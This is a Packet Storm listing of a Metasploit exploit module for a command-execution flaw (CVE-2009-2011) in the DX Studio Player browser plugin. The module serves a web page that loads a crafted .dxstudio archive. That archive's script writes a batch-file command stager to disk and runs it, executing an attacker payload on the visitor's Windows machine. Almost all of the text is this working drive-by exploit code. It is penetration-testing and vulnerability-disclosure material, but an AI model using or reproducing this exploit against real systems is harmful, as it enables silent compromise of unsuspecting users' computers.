Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution

2010-02-17T00:00:00
ID PACKETSTORM:86417
Type packetstorm
Reporter jduck
Modified 2010-02-17T00:00:00

Description

                                        
                                            `##  
# $Id: dxstudio_player_exec.rb 8541 2010-02-17 20:14:40Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
require 'rex/zip'  
  
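class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStager

  # Registers the module metadata with the framework: name, description,
  # references, the payload constraint (2048 bytes, Windows) and the single
  # "Automatic" target.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution',
      'Description'    => %q{
          This module exploits a command execution vulnerability within the
        DX Studio Player from Worldweaver. The player is a browser plugin for
        IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web
        page referring to a specially crafted .dxstudio document, an attacker can
        execute arbitrary commands.

        Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and
        IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow
        the plug-in to access local files. This prompt appears to occur only once per
        server host.

        NOTE: This exploit uses additionally dangerous script features to write to
        local files!
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'Version'        => '$Revision: 8541 $',
      'References'     =>
        [
          [ 'CVE', '2009-2011' ],
          [ 'BID', '35273' ],
          [ 'OSVDB', '54969' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/8922' ],
          [ 'URL', 'http://dxstudio.com/guide.aspx' ]
        ],
      'Payload'        =>
        {
          'Space' => 2048,
        },
      'Platform'       => 'win',
      # 'Arch' => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Jun 09 2009',
      'DefaultTarget'  => 0))
  end

  # HTTP callback for every request under the module's resource.
  #
  # Two things are served:
  #   * any URI containing "payload" gets the crafted .dxstudio archive
  #     (see #send_dxstudio_document);
  #   * everything else gets a landing page that embeds the DX Studio plugin
  #     (IE via the ActiveX classid, Firefox via <embed>) with its src set to
  #     "<base>/payload", so the browser fetches the archive itself.
  #
  # @param cli [Rex::Socket] connected client socket
  # @param request [Rex::Proto::Http::Request] the parsed request
  def on_request_uri(cli, request)
    # Absolute URL the victim can reach us on. When bound to all interfaces
    # we have no usable SRVHOST, so use the address that routes to the peer.
    host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url_base = "http://#{host}:#{datastore['SRVPORT']}#{get_resource}"
    payload_url = "#{url_base}/payload"

    if request.uri =~ /payload/
      send_dxstudio_document(cli)
      return
    end

    # The archive URL is a plain http:// URL we built ourselves, so it is
    # interpolated into the markup as-is.
    html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="#{payload_url}" />
<embed width=1 height=1 src=#{payload_url} type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|

    print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end

  private

  # Builds the malicious .dxstudio document for the current payload and sends
  # it to +cli+. The document is a zip archive whose header.xml carries an
  # onInit() script that writes a batch file holding the command stager and
  # then runs it through shell.execute().
  #
  # Nothing is sent when the framework cannot (re)generate a payload for this
  # client, mirroring the original behaviour.
  #
  # @param cli [Rex::Socket] connected client socket
  def send_dxstudio_document(cli)
    p = regenerate_payload(cli)
    return if p.nil?

    # The command stager already embeds the executable in the batch lines, so
    # no separate PE image is generated here (the original built one with
    # Msf::Util::EXE.to_win32pe and then discarded it).
    cmds = generate_cmdstager({}, 2047, p)

    # Guarantee a non-empty basename: rand(32) can return 0, which would have
    # produced a file called just ".bat".
    bat_name = rand_text_alphanumeric(1 + rand(31)) + ".bat"

    script = cmds.each_line.map { |ln| script_write_line(ln.chomp) }.join

    # Interpolation is used instead of gsub!(/PLACEHOLDER/, text): a gsub
    # replacement string has backslash sequences (\1, \\, \& ...) interpreted,
    # which would silently mangle stager lines containing backslashes.
    hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("#{bat_name}");
f.writeString('@echo off\\n');
#{script}
f.close();
shell.execute("#{bat_name}");
}]]>
</script>
</dxstudio>
|

    zip = Rex::Zip::Archive.new
    zip.add_file("header.xml", hdrxml)
    data = zip.pack

    print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...")
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end

  # Returns one script statement that appends +line+ followed by a newline to
  # the batch file. +line+ lands inside a single-quoted script string literal,
  # so the two characters that could terminate or escape that literal are
  # escaped first; the script engine already has to honour C-style escapes for
  # the trailing \n to work. Block-form gsub keeps the replacement literal.
  #
  # @param line [String] a single, already chomped command stager line
  # @return [String] the script statement, newline-terminated
  def script_write_line(line)
    escaped = line.gsub("\\") { "\\\\" }.gsub("'") { "\\'" }
    " f.writeString('#{escaped}\\n');\n"
  end
end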
  
=begin  
TODO:  
- make it more quiet  
- auto-migrate?  
=end  
`